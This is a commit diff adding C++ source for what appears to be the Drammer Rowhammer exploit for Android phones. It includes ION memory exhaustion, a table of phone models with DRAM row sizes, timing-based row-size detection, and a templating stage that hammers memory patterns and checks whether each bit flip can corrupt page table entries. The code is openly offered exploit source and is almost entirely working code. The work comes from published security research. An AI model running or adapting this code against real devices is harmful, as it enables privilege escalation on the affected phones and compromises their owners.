  118 + if (optopt == 'c' || optopt == 'd' || optopt == 'f' || optopt == 'q' || optopt == 'r' || optopt == 't')
  119 + fprintf(stderr, "Option -%c requires an argument.\n", optopt);
  120 + else if (isprint(optopt))
  121 + fprintf(stderr,"Unknown option `-%c'.\n", optopt);
  122 + else
  123 + fprintf(stderr,"Unknown option character `\\x%x'.\n", optopt);
  124 + usage(argv[0]);
  125 + return 1;
  126 + default:
  127 + abort();
  128 + }
  129 + }
  130 +
  131 +
  132 + printf("[MAIN] ION init\n");
  133 + ION_init();
  134 +
  135 + std::vector<struct ion_data *> ion_chunks;
  136 + std::vector<struct template_t *> templates;
  137 +
  138 + if (outputfile != NULL) {
  139 + global_of = fopen(outputfile, "w");
  140 + if (global_of == NULL) {
  141 + perror("could not open output file");
  142 + exit(0);
  143 + }
  144 + setvbuf(global_of, NULL, _IONBF, 0);
  145 + }
  146 + setvbuf(stderr, NULL, _IONBF, 0);
  147 + setvbuf(stdout, NULL, _IONBF, 0);
  148 +
  149 +
  150 + if (heap_type_detector) {
  151 + ION_detector();
  152 + return 0;
  153 + }
  154 +
  155 + if (cpu_pinning != -1) {
  156 + printf("[MAIN] Pinning to CPU...\n");
  157 + cpu_set_t cpuset;
  158 + CPU_ZERO(&cpuset);
  159 + CPU_SET(cpu_pinning, &cpuset);
  160 + if (sched_setaffinity(0, sizeof(cpuset), &cpuset)) {
  161 + perror("Could not pin CPU");
  162 + }
  163 + }
  164 +
  165 + /*** DEFRAG MEMORY */
  166 + if (alloc_timer) {
  167 + printf("[MAIN] Defragment memory\n");
  168 + defrag(alloc_timer);
  169 + }
  170 +
  171 + /*** ROW SIZE DETECTION (if not specified) */
  172 + if (!VALID_ROWSIZES.count(rowsize)) {
  173 + printf("[MAIN] No or weird row size provided, trying auto detect\n");
  174 + rowsize = RS_autodetect();
  175 + }
  176 + print("[MAIN] Row size: %d\n", rowsize);
  177 +
  178 + /*** EXHAUST */
  179 + printf("[MAIN] Exhaust ION chunks for templating\n");
  180 + exhaust(ion_chunks, rowsize * 4);
  181 +
  182 +
  183 + /* patterns: above victim below
  184 + * p000 0x00000000 0x00000000 0x00000000
  185 + * p001 0x00000000 0x00000000 0xffffffff
  186 + * p010 0x00000000 0xffffffff 0x00000000 <-- default
  187 + * p011 0x00000000 0xffffffff 0xffffffff
  188 + * p100 0xffffffff 0x00000000 0x00000000
  189 + * p101 0xffffffff 0x00000000 0xffffffff <-- default
  190 + * p110 0xffffffff 0xffffffff 0x00000000
  191 + * p111 0xffffffff 0xffffffff 0xffffffff
  192 + *
  193 + * p00r 0x00000000 0x00000000 0x<RANDOM>
  194 + * p0r0 0x00000000 0x<RANDOM> 0x00000000
  195 + * p0rr 0x00000000 0x<RANDOM> 0x<RANDOM>
  196 + * pr00 0x<RANDOM> 0x00000000 0x00000000
  197 + * pr0r 0x<RANDOM> 0x00000000 0x<RANDOM>
  198 + * prr0 0x<RANDOM> 0x<RANDOM> 0x00000000
  199 + * prrr 0x<RANDOM> 0x<RANDOM> 0x<RANDOM>
  200 + */
  201 +
  202 + printf("[MAIN] Initializing patterns\n");
  203 + uint8_t ones[MAX_ROWSIZE];
  204 + uint8_t zeros[MAX_ROWSIZE];
  205 + uint8_t rand1[MAX_ROWSIZE];
  206 + uint8_t rand2[MAX_ROWSIZE];
  207 + uint8_t rand3[MAX_ROWSIZE];
  208 + memset( ones, 0xff, MAX_ROWSIZE);
  209 + memset(zeros, 0x00, MAX_ROWSIZE);
  210 + for (int i = 0; i < MAX_ROWSIZE; i++) {
  211 + rand1[i] = rand() % 255;
  212 + rand2[i] = rand() % 255;
  213 + rand3[i] = rand() % 255;
  214 + }
  215 +
  216 + pattern_t p000 = { .above = zeros, .victim = zeros, .below = zeros, .cur_use = 0, .max_use = 0, .reset_above = NULL, .reset_victim = NULL, .reset_below = NULL };
  217 + pattern_t p001 = { .above = zeros, .victim = zeros, .below = ones, .cur_use = 0, .max_use = 0, .reset_above = NULL, .reset_victim = NULL, .reset_below = NULL };
  218 + pattern_t p010 = { .above = zeros, .victim = ones, .below = zeros, .cur_use = 0, .max_use = 0, .reset_above = NULL, .reset_victim = NULL, .reset_below = NULL };
  219 + pattern_t p011 = { .above = zeros, .victim = ones, .below = ones, .cur_use = 0, .max_use = 0, .reset_above = NULL, .reset_victim = NULL, .reset_below = NULL };
  220 + pattern_t p100 = { .above = ones, .victim = zeros, .below = zeros, .cur_use = 0, .max_use = 0, .reset_above = NULL, .reset_victim = NULL, .reset_below = NULL };
  221 + pattern_t p101 = { .above = ones, .victim = zeros, .below = ones, .cur_use = 0, .max_use = 0, .reset_above = NULL, .reset_victim = NULL, .reset_below = NULL };
  222 + pattern_t p110 = { .above = ones, .victim = ones, .below = zeros, .cur_use = 0, .max_use = 0, .reset_above = NULL, .reset_victim = NULL, .reset_below = NULL };
  223 + pattern_t p111 = { .above = ones, .victim = ones, .below = ones, .cur_use = 0, .max_use = 0, .reset_above = NULL, .reset_victim = NULL, .reset_below = NULL };
  224 +
  225 + pattern_t p00r = { .above = zeros, .victim = zeros, .below = rand3, .cur_use = 0, .max_use = 100, .reset_above = NULL, .reset_victim = NULL, .reset_below = resetter };
  226 + pattern_t p0r0 = { .above = zeros, .victim = rand2, .below = zeros, .cur_use = 0, .max_use = 100, .reset_above = NULL, .reset_victim = resetter, .reset_below = NULL };
  227 + pattern_t p0rr = { .above = zeros, .victim = rand2, .below = rand3, .cur_use = 0, .max_use = 100, .reset_above = NULL, .reset_victim = resetter, .reset_below = resetter };
  228 + pattern_t pr00 = { .above = rand1, .victim = zeros, .below = zeros, .cur_use = 0, .max_use = 100, .reset_above = resetter, .reset_victim = NULL, .reset_below = NULL };
  229 + pattern_t pr0r = { .above = rand1, .victim = zeros, .below = rand1, .cur_use = 0, .max_use = 100, .reset_above = resetter, .reset_victim = NULL, .reset_below = resetter };
  230 + pattern_t prr0 = { .above = rand1, .victim = rand2, .below = zeros, .cur_use = 0, .max_use = 100, .reset_above = resetter, .reset_victim = resetter, .reset_below = NULL };
  231 + pattern_t prrr = { .above = rand1, .victim = rand2, .below = rand3, .cur_use = 0, .max_use = 100, .reset_above = resetter, .reset_victim = resetter, .reset_below = resetter };
  232 +
  233 + std::vector<struct pattern_t *> patterns;
  234 + if (all_patterns)
  235 + patterns = {&p000, &p001, &p010, &p011, &p100, &p101, &p110, &p111,
  236 + &p00r, &p0r0, &p0rr, &pr00, &pr0r, &prr0, &prrr};
  237 + else
  238 + patterns = {&p101, &p010};
  239 +
  240 + /*** TEMPLATE */
  241 + printf("[MAIN] Start templating\n");
  242 + TMPL_run(ion_chunks, templates, patterns, timer, hammer_readcount, do_conservative);
  243 +
  244 + /*** CLEAN UP */
  245 + ION_clean_all(ion_chunks);
  246 +
  247 + printf("[MAIN] ION fini\n");
  248 + ION_fini();
  249 +}
... ...
exploits/drammer/rowsize.cc 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/drammer/rowsize.cc
  1 +/*
  2 + * Copyright 2016, Victor van der Veen
  3 + *
  4 + * Licensed under the Apache License, Version 2.0 (the "License");
  5 + * you may not use this file except in compliance with the License.
  6 + * You may obtain a copy of the License at
  7 + *
  8 + * http://www.apache.org/licenses/LICENSE-2.0
  9 + *
  10 + * Unless required by applicable law or agreed to in writing, software
  11 + * distributed under the License is distributed on an "AS IS" BASIS,
  12 + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  13 + * See the License for the specific language governing permissions and
  14 + * limitations under the License.
  15 + */
  16 +
  17 +
  18 +#include <algorithm>
  19 +#include <cmath>
  20 +#include <cstdio>
  21 +#include <memory>
  22 +#include <numeric>
  23 +#include <string>
  24 +#include <iostream>
  25 +
  26 +#include <stdlib.h>
  27 +#include <sys/mman.h>
  28 +#include <unistd.h>
  29 +
  30 +#include "helper.h"
  31 +#include "ion.h"
  32 +#include "rowsize.h"
  33 +
  34 +#define ROWSIZE_READCOUNT 2500000 // 2.5 million reads
  35 +#define ROWSIZE_PAGES 64
  36 +
  37 +#define DEFAULT_ROWSIZE K(64)
  38 +
  39 +std::vector<struct model> models = {
  40 +// model ro.product.name board platform ion row generic name
  41 +
  42 +// Snapdragon 820
  43 +// {"SM-G935T", "hero2qltetmo", "msm8996", "msm8996", 21, 0, "Samsung Galaxy S7 Edge"},
  44 +// {"SAMSUNG-SM-G930A", "heroqlteuc","MSM8996", "msm8996", 21, 0, "Samsung Galaxy S7"},
  45 +
  46 +// Snapdragon 810
  47 +// {"Nexus 6P", "angler", "angler", "msm8994", 21, 0, "Huawei Nexus 6P"},
  48 + {"E6853", "E6853", "msm8994", "msm8994", 21, K(64), "Sony Xperia Z5"},
  49 +
  50 +// Snapdragon 808
  51 + {"Nexus 5X", "bullhead", "bullhead", "msm8992", 21, K(64), "LG Nexus 5X"},
  52 + {"LG-H960", "pplus_global_com", "msm8992", "msm8992", 21, K(64), "LG V10"},
  53 + {"LG-H815", "p1_global_com", "msm8992", "msm8992", 21, K(64), "LG G4"},
  54 +
  55 + {"C1905", "cm_nicki", "qcom", "msm8960", 22, K(32), "Sony Xperia M"},
  56 +
  57 +// Snapdragon 805
  58 + {"SM-G901F", "kccat6xx", "APQ8084", "apq8084", 21, K(128), "Samsung Galaxy S5 Plus"},
  59 +// {"SM-N910V", "trltevzw", "APQ8084", "apq8084", 21, 0, "Samsung Galaxy Note 4"},
  60 +
  61 +// Snapdragon 800
  62 + {"Nexus 5", "hammerhead", "hammerhead", "msm8974", 21, K(64), "LG Nexus 5"},
  63 + {"A0001", "bacon", "MSM8974", "msm8974", 21, K(128), "OnePlus One"},
  64 + {"SM-G870F", "klteactivexx", "MSM8974", "msm8974", 21, K(64), "Samsung Galaxy S5 Active"},
  65 +// {"SM-G900T", "kltetmo", "MSM8974", "msm8974", 21, 0, "Samsung Galaxy S5"},
  66 +
  67 +// Snapdragon 410:
  68 +// {"SM-A500FU", "a5ultexx", "MSM8916", "msm8916", 21, 0, "Samsung Galaxy A5"},
  69 +// {"MotoG3", "osprey_retus", "msm8916", "msm8916", 21, 0, "Motorola Moto G 3rd Gen"},
  70 + {"GT-I9195I", "serranoveltexx", "MSM8916", "msm8916", 21, K(32), "Samsung Galaxy S4 Mini"},
  71 + {"KIW-L21", "KIW-L21", "KIW-L21", "msm8916", 21, K(32), "Huawei Honor 5X"},
  72 + {"MotoE2(4G-LTE)", "surnia_reteu","msm8916", "msm8916", 21, K(32), "Motorola Moto E 2nd Gen"},
  73 + {"MotoG3", "osprey_reteu", "msm8916", "msm8916", 21, K(32), "Motorola Moto G 3rd Gen"},
  74 + {"HUAWEI RIO-L01", "RIO-L01", "RIO-L01", "msm8916", 21, K(64), "Huawei GX8/G8"},
  75 + {"HTC One M8s","m8qlul_htc_europe","msm8939", "msm8916", 21, K(64), "HTC One M8s"},
  76 +
  77 +// Snapdragon 400:
  78 + {"XT1064", "titan_retuaws", "MSM8226", "msm8226", 21, K(32), "Motorola Moto G 2nd Gen"},
  79 + {"XT1068", "titan_retaildsds", "MSM8226", "msm8226", 21, K(32), "Motorola Moto G 2nd Gen"},
  80 +// {"LG-V410", "e7lte_att_us", "MSM8226", "msm8226", 21, 0, "LG G Pad 7.0"},
  81 +
  82 + {"SM-J320FN", "j3xnltexx", "SC9830I", "sc8830", 2, K(32), "Samsung Galaxy J3 2016"},
  83 + {"SM-A310F", "a3xeltexx", "universal7580", "exynos5", 4, K(64), "Samsung Galaxy A3 2016"}, // not sure about the rowsize...
  84 + {"SM-A700F", "a7altexx", "universal5430", "exynos5", 4, K(128), "Samsung Galaxy A7"},
  85 + {"SM-G920F", "zerofltexx", "universal7420", "exynos5", 4, K(128), "Samsung Galaxy S6"},
  86 + {"SM-G935F", "hero2ltexx", "universal8890", "exynos5", 4, K(256), "Samsung Galaxy S7 Edge"},
  87 + {"SM-G930F", "heroltexx", "universal8890", "exynos5", 4, K(256), "Samsung Galaxy S7"},
  88 +// {"SM-T710", "gts28wifixx", "universal5433", "exynos5", 4, 0, "Samsung Galaxy Tab S2 8.0"},
  89 + {"SM-G935F", "hero2ltexx", "universal8890", "exynos5", 4, K(256), "Samsung Galaxy S7 Edge"},
  90 + {"SM-G930F", "heroltexx", "universal8890", "exynos5", 4, K(256), "Samsung Galaxy S7"},
  91 +// {"SM-T710", "gts28wifixx", "universal5433", "exynos5", 4, 0, "Samsung Galaxy Tab S2 8.0"},
  92 +// {"SM-T810", "gts210wifixx", "universal5433", "exynos5", 4, 0, "Samsung Galaxy Tab S2 9.7"},
  93 + { "SM-N910C", "treltexx", "universal5433", "exynos5", 4, K(64), "Samsung Galaxy Note 4"},
  94 +
  95 + // Snapdragon S4
  96 +// {"AOSP on Mako", "full_mako", "MAKO", "msm8960", 21, 0, ""},
  97 +
  98 + {"ALE-L21", "ALE-L21", "BalongV8R1SFT", "hi6210sft",1, K(32), "Huawei P8 Lite"},
  99 + {"EVA-L09", "EVA-L09", "EVA-L09", "hi3650", 1, K(64), "Huawei P9"},
  100 + {"HUAWEI VNS-L31", "VNS-L31", "VNS-L31", "hi6250", 1, K(32), "Huawei P9 Lite"},
  101 +
  102 + {"NEO6_LTE", "NEO6_LTE", "", "mt6735", 1, K(32), "Odys Neo 6"},
  103 +
  104 + {"HTC Desire 830 dual sim","a51cml_dtul_00401","", "mt6753", 1, K(64), "HTC Desire 830"},
  105 +
  106 + {"E5603", "E5603", "", "mt6795", 1, K(64), "Sony Xperia M5"}
  107 +
  108 +
  109 + // MT6572
  110 +// {"Goophone i5C", "mbk72_wet_jb3", "mbk72_wet_jb3", "", 21, 0, "Goophone i5C"},
  111 +
  112 + // MT8735
  113 +
  114 +
  115 +};
  116 +
  117 +int rowsize;
  118 +
  119 +uint64_t compute_mad(std::vector<uint64_t> &v) {
  120 + uint64_t median = compute_median(v);
  121 +
  122 + std::vector<uint64_t> absolute_deviations;
  123 + for (auto it : v) {
  124 + if (it < median) absolute_deviations.push_back( median - it );
  125 + else absolute_deviations.push_back (it - median );
  126 + }
  127 + sort(absolute_deviations.begin(), absolute_deviations.end());
  128 + return compute_median(absolute_deviations);
  129 +}
  130 +
  131 +uint64_t compute_iqr(std::vector<uint64_t> &v, uint64_t *q1, uint64_t *q2, uint64_t *q3) {
  132 + std::vector<uint64_t> tmp = v;
  133 + sort(tmp.begin(), tmp.end());
  134 + auto const i1 = tmp.size() / 4;
  135 + auto const i2 = tmp.size() / 2;
  136 + auto const i3 = i1 + i2;
  137 + std::nth_element(tmp.begin(), tmp.begin() + i1, tmp.end());
  138 + std::nth_element(tmp.begin() + i1 + 1, tmp.begin() + i2, tmp.end());
  139 + std::nth_element(tmp.begin() + i2 + 1, tmp.begin() + i3, tmp.end());
  140 + *q1 = tmp[i1];
  141 + *q2 = tmp[i2];
  142 + *q3 = tmp[i3];
  143 + return (tmp[i3] - tmp[i1]);
  144 +}
  145 +
  146 +std::string getprop(std::string property) {
  147 + std::string cmd = "/system/bin/getprop ";
  148 + cmd += property;
  149 +
  150 + char buffer[128];
  151 + std::string value = "";
  152 + std::shared_ptr<FILE> pipe(popen(cmd.c_str(), "r"), pclose);
  153 + if (!pipe) {
  154 + perror("popen failed");
  155 + return value;
  156 + }
  157 + while (!feof(pipe.get())) {
  158 + if (fgets(buffer, 128, pipe.get()) != NULL)
  159 + value += buffer;
  160 + }
  161 + value.erase(std::remove(value.begin(), value.end(), '\n'), value.end());
  162 + return value;
  163 +}
  164 +
  165 +#define KNOWN_MODEL 2
  166 +#define FAMILIAR_MODEL 1
  167 +#define UNKNOWN_MODEL 0
  168 +struct model *get_model(int *familiarity) {
  169 + std::string model = getprop("ro.product.model");
  170 + print("[RS] ro.product.model: %s\n", model.c_str());
  171 +
  172 + std::string name = getprop("ro.product.name");
  173 + print("[RS] ro.product.name: %s\n",name.c_str());
  174 +
  175 + std::string board = getprop("ro.product.board");
  176 + print("[RS] ro.product.board: %s\n", board.c_str());
  177 +
  178 + std::string platform = getprop("ro.board.platform");
  179 + print("[RS] ro.board.platform: %s\n", platform.c_str());
  180 +
  181 + for (std::vector<struct model>::iterator it = models.begin();
  182 + it != models.end();
  183 + ++it) {
  184 + struct model *m = &(*it);
  185 + if (m->model == model || m->name == name) {
  186 + print("[RS] known model: %s\n", m->generic_name.c_str());
  187 + *familiarity = KNOWN_MODEL;
  188 + return m;
  189 + }
  190 + }
  191 +
  192 + for (std::vector<struct model>::iterator it = models.begin();
  193 + it != models.end();
  194 + ++it) {
  195 + struct model *m = &(*it);
  196 + if (m->board == board || m->platform == platform) {
  197 + printf("[RS] familiar model: %s\n", m->generic_name.c_str());
  198 + *familiarity = FAMILIAR_MODEL;
  199 + return m;
  200 + }
  201 + }
  202 +
  203 + *familiarity = UNKNOWN_MODEL;
  204 + return NULL;
  205 +}
  206 +
  207 +
  208 +/* auto detect row size */
  209 +int RS_autodetect(void) {
  210 +
  211 + print("[RS] Trying getprop\n");
  212 + int familiarity;
  213 + struct model *m = get_model(&familiarity);
  214 + if (familiarity == KNOWN_MODEL) {
  215 + rowsize = m->rowsize;
  216 + return rowsize;
  217 + }
  218 +
  219 +
  220 + print("[RS] Allocating 256 ion chunk\n");
  221 + struct ion_data data;
  222 + data.handle = ION_alloc(K(256));
  223 + if (data.handle == 0) {
  224 + perror("Could not allocate 256K chunk for row size detection");
  225 + exit(EXIT_FAILURE);
  226 + }
  227 + data.len = K(256);
  228 + ION_mmap(&data);
  229 +
  230 + print("[RS] Reading from page 0 and page x (x = 0..%d)\n",ROWSIZE_PAGES);
  231 + std::vector<uint64_t> deltas;
  232 + int page1 = 0;
  233 + volatile uintptr_t *virt1 = (volatile uintptr_t *) ((uint64_t) data.mapping + (page1 * PAGESIZE));
  234 + for (int page2 = 0; page2 < ROWSIZE_PAGES; page2++) {
  235 + volatile uintptr_t *virt2 = (volatile uintptr_t *) ((uint64_t) data.mapping + (page2 * PAGESIZE));
  236 +
  237 + uint64_t t1 = get_ns();
  238 + for (int i = 0; i < ROWSIZE_READCOUNT; i++) {
  239 + *virt1;
  240 + *virt2;
  241 + }
  242 + uint64_t t2 = get_ns();
  243 + deltas.push_back((t2 - t1) / ROWSIZE_READCOUNT);
  244 +
  245 + print("%llu ", deltas.back());
  246 + }
  247 + print("\n");
  248 +
  249 + if (munmap(data.mapping, data.len)) {
  250 + perror("Could not munmap");
  251 + exit(EXIT_FAILURE);
  252 + }
  253 + if (close(data.fd)) {
  254 + perror("Could not close");
  255 + exit(EXIT_FAILURE);
  256 + }
  257 + if (ION_free(data.handle)) {
  258 + perror("Could not free");
  259 + exit(EXIT_FAILURE);
  260 + }
  261 +
  262 + uint64_t q1, q2, q3;
  263 + uint64_t iqr = compute_iqr (deltas, &q1, &q2, &q3);
  264 + uint64_t median = compute_median(deltas);
  265 + uint64_t mad = compute_mad (deltas);
  266 +
  267 + print("[RS] Median: %llu\n", median);
  268 + print("[RS] MAD: %llu\n", mad);
  269 + print("[RS] IQR: %llu\n", iqr);
  270 +
  271 + // MAD, IQR and standard deviation all need some form of correction... :(
  272 + iqr += 5;
  273 + print("[RS] Corrected IQR: %llu\n", iqr);
  274 +
  275 +
  276 + /* try simple algorithm first */
  277 + int count = 0;
  278 + for (auto it: deltas) {
  279 + if (it < 2*median) {
  280 + count++;
  281 + } else {
  282 + break;
  283 + }
  284 + }
  285 + printf("count: %d\n", count);
  286 + rowsize = count * 4096;
  287 +
  288 + /* do more advanced stuff if the rowsize is absurd */
  289 + if (rowsize >= K(128)) {
  290 +
  291 + print("[RS] Sequences: ");
  292 + std::vector<uint64_t> seq_normal;
  293 + std::vector<uint64_t> seq_outlier;
  294 + int sn = 0; int so = 0;
  295 + for (auto it : deltas) {
  296 + if (it < q1 - 1.5*iqr || it > q3 + 1.5*iqr) {
  297 + if (so != 0) {
  298 + seq_normal.push_back(so);
  299 + print("%d ", so);
  300 + so = 0;
  301 + }
  302 + sn++;
  303 + } else {
  304 + if (sn != 0) {
  305 + seq_outlier.push_back(sn);
  306 + print("%d ", sn);
  307 + sn = 0;
  308 + }
  309 + so++;
  310 + }
  311 + }
  312 + printf("\n");
  313 +
  314 + rowsize = (compute_median(seq_normal) + compute_median(seq_outlier)) * 4096;
  315 + }
  316 +
  317 +
  318 + print("[RS] Detected row size: %d\n", rowsize);
  319 + if (!VALID_ROWSIZES.count(rowsize)) {
  320 + if (familiarity == FAMILIAR_MODEL) {
  321 + print("[RS] WARNING! Weird row size detected, assuming familiar model's rowsize %d\n", m->rowsize);
  322 + rowsize = m->rowsize;
  323 + } else {
  324 + print("[RS] WARNING! Weird row size detected, assuming %d\n", DEFAULT_ROWSIZE);
  325 + rowsize = DEFAULT_ROWSIZE;
  326 + }
  327 + }
  328 +
  329 + return rowsize;
  330 +}
... ...
exploits/drammer/rowsize.h 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/drammer/rowsize.h
  1 +/*
  2 + * Copyright 2016, Victor van der Veen
  3 + *
  4 + * Licensed under the Apache License, Version 2.0 (the "License");
  5 + * you may not use this file except in compliance with the License.
  6 + * You may obtain a copy of the License at
  7 + *
  8 + * http://www.apache.org/licenses/LICENSE-2.0
  9 + *
  10 + * Unless required by applicable law or agreed to in writing, software
  11 + * distributed under the License is distributed on an "AS IS" BASIS,
  12 + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  13 + * See the License for the specific language governing permissions and
  14 + * limitations under the License.
  15 + */
  16 +
  17 +#ifndef __ROWSIZE_H__
  18 +#define __ROWSIZE_H__
  19 +
  20 +#include <set>
  21 +
  22 +#include "helper.h"
  23 +
  24 +const std::set<int> VALID_ROWSIZES = {K(16), K(32), K(64), K(128), K(256)};
  25 +
  26 +#define PAGES_PER_ROW (rowsize / PAGESIZE)
  27 +#define MAX_ROWSIZE K(256)
  28 +
  29 +int RS_autodetect(void);
  30 +
  31 +struct model {
  32 + std::string model; // ro.product.model
  33 + std::string name; // ro.product.name
  34 + std::string board; // ro.product.board
  35 + std::string platform; // ro.board.platform
  36 + int kmalloc_heap;
  37 + int rowsize;
  38 + std::string generic_name;
  39 +};
  40 +
  41 +
  42 +#endif // __ROWSIZE_H__
... ...
exploits/drammer/templating.cc 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/drammer/templating.cc
  1 +/*
  2 + * Copyright 2016, Victor van der Veen
  3 + *
  4 + * Licensed under the Apache License, Version 2.0 (the "License");
  5 + * you may not use this file except in compliance with the License.
  6 + * You may obtain a copy of the License at
  7 + *
  8 + * http://www.apache.org/licenses/LICENSE-2.0
  9 + *
  10 + * Unless required by applicable law or agreed to in writing, software
  11 + * distributed under the License is distributed on an "AS IS" BASIS,
  12 + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  13 + * See the License for the specific language governing permissions and
  14 + * limitations under the License.
  15 + */
  16 +
  17 +
  18 +#include <assert.h>
  19 +#include <stdlib.h>
  20 +
  21 +#include "ion.h"
  22 +#include "rowsize.h"
  23 +#include "templating.h"
  24 +
  25 +extern int rowsize;
  26 +
  27 +#define PAGES_PER_ROW (rowsize / PAGESIZE)
  28 +
  29 +#define FLIP_DIRECTION_STR(x) (((x) == ONE_TO_ZERO) ? "1-to-0" : "0-to-1")
  30 +
  31 +//#define DEBUG
  32 +
  33 +#ifdef DEBUG
  34 +#define dprintf(...) printf(__VA_ARGS__)
  35 +#else
  36 +#define dprintf(...) do {} while (0)
  37 +#endif
  38 +
  39 +
  40 +int spc_flips = 0;
  41 +
  42 +bool is_exploitable(struct template_t *tmpl) {
  43 + int rows_per_chunk = tmpl->ion_len / rowsize;
  44 +
  45 + dprintf("- bits flipped : %6d\n", tmpl->bits_set);
  46 + if (tmpl->bits_set != 1) {
  47 + dprintf("[ :( ] We support only single flips\n");
  48 + return false;
  49 + }
  50 +
  51 + dprintf("- index in page table: %6d\n", tmpl->word_index_in_pt);
  52 + if (tmpl->word_index_in_pt < 0) {
  53 + dprintf("[ :( ] Flip will never fall in hardware page table\n");
  54 + return false;
  55 + }
  56 +
  57 + dprintf("- index in word : %6d\n", tmpl->bit_index_in_word);
  58 + if (tmpl->bit_index_in_word < 12) {
  59 + dprintf("[ :( ] Flip is in properties of PTE\n");
  60 + return false;
  61 + }
  62 +
  63 +
  64 + dprintf("- flip direction : %s\n", FLIP_DIRECTION_STR(tmpl->direction));
  65 +
  66 + dprintf("- relative target pfn: %6d (row: %6d, idx: %2d, 16k: %6d)\n", tmpl->target_pfn, tmpl->target_pfn_row, tmpl->target_page_index_in_row, tmpl->target_16k_pfn);
  67 + dprintf("- relative source pfn: %6d (row: %6d, idx: %2d, 16k: %6d)\n", tmpl->source_pfn, tmpl->source_pfn_row, tmpl->source_page_index_in_row, tmpl->source_16k_pfn);
  68 + if (tmpl->source_pfn_row < 0 || tmpl->source_pfn_row >= rows_per_chunk) {
  69 + dprintf("[ :( ] Flip offset requires illegal source pfn\n");
  70 + return false;
  71 + }
  72 +
  73 + if (tmpl->direction == ZERO_TO_ONE) {
  74 + /* A 0-to-1 flip in the PTE acts as an addition. If the new PFN (the
  75 + * page table) is in the same row as the old PFN (the mapped ION data chunk),
  76 + * it should be (1) ahead of the old one, and (2) fall in a different
  77 + * 'minimum ION chunk boundary' (dictated by what ION allocations go
  78 + * through slab, usually < 16K). */
  79 + if (tmpl->source_pfn_row == tmpl->target_pfn_row) {
  80 + if (tmpl->source_16k_pfn >= tmpl->target_16k_pfn) {
  81 + dprintf("[ :( ] Target 16k pfn not after source 16k pfn\n");
  82 + return false;
  83 + }
  84 + } else if (tmpl->source_pfn_row > tmpl->target_pfn_row) {
  85 + dprintf("[ :( ] Target row not after source row\n");
  86 + return false;
  87 + }
  88 + } else {
  89 + /* A 1-to-0 flip in the PTE acts as an addition, so it's all backwards
  90 + * now */
  91 + if (tmpl->source_pfn_row == tmpl->target_pfn_row) {
  92 + if (tmpl->source_16k_pfn <= tmpl->target_16k_pfn) {
  93 + dprintf("[ :( ] Target 16k pfn not before source 16k pfn\n");
  94 + return false;
  95 + }
  96 + } else if (tmpl->source_pfn_row < tmpl->target_pfn_row) {
  97 + dprintf("[ :( ] Target row not before source row\n");
  98 + return false;
  99 + }
  100 + }
  101 +
  102 + dprintf("[ :) ] FLIP MIGHT BE EXPLOITABLE!\n");
  103 + return true;
  104 +}
  105 +
  106 +bool template_exists(std::vector<struct template_t *> &templates,
  107 + uintptr_t virt, uint32_t org_byte, uint32_t new_byte) {
  108 + for (auto tmpl : templates) {
  109 + if (tmpl->virt_addr == virt &&
  110 + tmpl->org_byte == org_byte &&
  111 + tmpl->new_byte == new_byte) return true;
  112 + }
  113 + return false;
  114 +}
  115 +
  116 +
  117 +void handle_flip(uint8_t *virt_row,
  118 + uintptr_t *virt_above,
  119 + uintptr_t *virt_below,
  120 + uint8_t *pattern,
  121 + std::vector<struct template_t *> &templates, int index_in_row, struct ion_data *chunk) {
  122 +
  123 + struct template_t *tmpl = (struct template_t *) malloc(sizeof(struct template_t));
  124 +
  125 + tmpl->virt_row = (uintptr_t) virt_row;
  126 + tmpl->virt_addr = (uintptr_t) virt_row + index_in_row;
  127 + tmpl->phys_addr = (uintptr_t) get_phys_addr(tmpl->virt_addr);
  128 + tmpl->virt_page = (uintptr_t) (tmpl->virt_addr / PAGESIZE) * PAGESIZE;
  129 + tmpl->virt_above = (uintptr_t) virt_above;
  130 + tmpl->virt_below = (uintptr_t) virt_below;
  131 +
  132 + tmpl->org_byte = (uint8_t) pattern[index_in_row];
  133 + tmpl->new_byte = (uint8_t) virt_row[index_in_row];
  134 + tmpl->org_word = (uint32_t) ((uint32_t *) pattern)[index_in_row / 4];
  135 + tmpl->new_word = (uint32_t) ((uint32_t *)virt_row)[index_in_row / 4];
  136 + tmpl->xorred_byte = tmpl->org_byte ^ tmpl->new_byte;
  137 + tmpl->xorred_word = tmpl->org_word ^ tmpl->new_word;
  138 + tmpl->bits_set = __builtin_popcount(tmpl->xorred_word);
  139 +
  140 + tmpl->byte_index_in_row = index_in_row;
  141 + tmpl->byte_index_in_page = index_in_row % PAGESIZE;
  142 + tmpl->word_index_in_page = tmpl->byte_index_in_page / 4;
  143 + tmpl->word_index_in_pt = tmpl->word_index_in_page - 512;
  144 + tmpl->bit_index_in_word = ffs(tmpl->xorred_word) - 1;
  145 +
  146 + tmpl->org_bit = (tmpl->org_word & tmpl->xorred_word) >> tmpl->bit_index_in_word;
  147 + tmpl->direction = tmpl->org_bit ? ONE_TO_ZERO : ZERO_TO_ONE;
  148 +
  149 + tmpl->ion_chunk = chunk;
  150 + tmpl->ion_len = chunk->len;
  151 +
  152 + tmpl->rel_address = (uintptr_t) tmpl->virt_addr - (uintptr_t) tmpl->ion_chunk->mapping;
  153 + tmpl->rel_row_index = tmpl->rel_address / rowsize;
  154 + tmpl->rel_pfn = tmpl->rel_address / PAGESIZE;
  155 +
  156 + tmpl->target_pfn = tmpl->rel_pfn;
  157 + tmpl->source_pfn = tmpl->target_pfn ^ (1 << (tmpl->bit_index_in_word - 12));
  158 + tmpl->target_pfn_row = tmpl->target_pfn / PAGES_PER_ROW;
  159 + tmpl->source_pfn_row = tmpl->source_pfn / PAGES_PER_ROW;
  160 + tmpl->target_pte = tmpl->target_pfn << 12;
  161 + tmpl->source_pte = tmpl->source_pfn << 12;
  162 + tmpl->target_page_index_in_row = tmpl->target_pfn - (tmpl->target_pfn_row * PAGES_PER_ROW);
  163 + tmpl->source_page_index_in_row = tmpl->source_pfn - (tmpl->source_pfn_row * PAGES_PER_ROW);
  164 +
  165 + tmpl->target_16k_pfn = tmpl->target_pfn / 4;
  166 + tmpl->source_16k_pfn = tmpl->source_pfn / 4;
  167 + tmpl->found_at = time(NULL);
  168 +
  169 +
